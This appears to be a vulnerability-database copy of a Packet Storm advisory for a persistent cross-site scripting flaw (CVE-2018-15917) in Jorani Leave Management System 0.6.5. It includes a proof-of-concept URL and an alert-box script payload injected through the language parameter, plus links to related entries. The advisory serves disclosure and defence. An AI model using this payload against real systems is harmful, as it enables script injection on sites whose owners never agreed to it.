Lucene search
Javier OlmedoPACKETSTORM:149255HistorySep 06, 2018 - 12:00 a.m.
Jorani Leave Management System 0.6.5 Cross Site Scripting
2018-09-0600:00:00
Javier Olmedo
packetstormsecurity.com
18
0.037 Low
EPSS
Percentile
91.8%
`# Exploit Title: Jorani Leave Management System 0.6.5 a Cross-Site Scripting
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-09-06
# Google Dork: N/A
# Vendor: Benjamin BALET
# Software Link: https://jorani.org/download.html
# Affected Version: 0.6.5 and possibly before
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-15917
# 1. Technical Description:
# Language parameter is vulnerable to Persistent Cross-Site Scripting (XSS) attacks through
# a GET request in which the values are stored in the user session.
# 2. Proof Of Concept (PoC):
# Go to http://localhost/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-15917%27)%3C%2Fscript%3E&login=&CipheredValue=
# 3. Payload:
# en"><script>alert('PoC CVE-2018-15917')</script>
# 6. Reference:
# https://hackpuntes.com/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/
# https://github.com/bbalet/jorani/issues/254
`
Related
cve
cve
CVE-2018-15917
2018-09-05 21:29:02
zdt
zdt
Jorani Leave Management 0.6.5 - Cross-Site Scripting Vulnerability
2018-09-06 00:00:00
prion
prion
Cross site scripting
2018-09-05 21:29:00
nvd
nvd
CVE-2018-15917
2018-09-05 21:29:02
nuclei
nuclei
Jorani Leave Management System 0.6.5 - Cross-Site Scripting
2023-08-31 15:43:46
cvelist
cvelist
CVE-2018-15917
2018-09-05 21:00:00
osv
osv
CVE-2018-15917
2018-09-05 21:29:02
exploitpack
exploitpack
Jorani Leave Management 0.6.5 - Cross-Site Scripting
2018-09-06 00:00:00
exploitdb
exploitdb
Jorani Leave Management 0.6.5 - Cross-Site Scripting
2018-09-06 00:00:00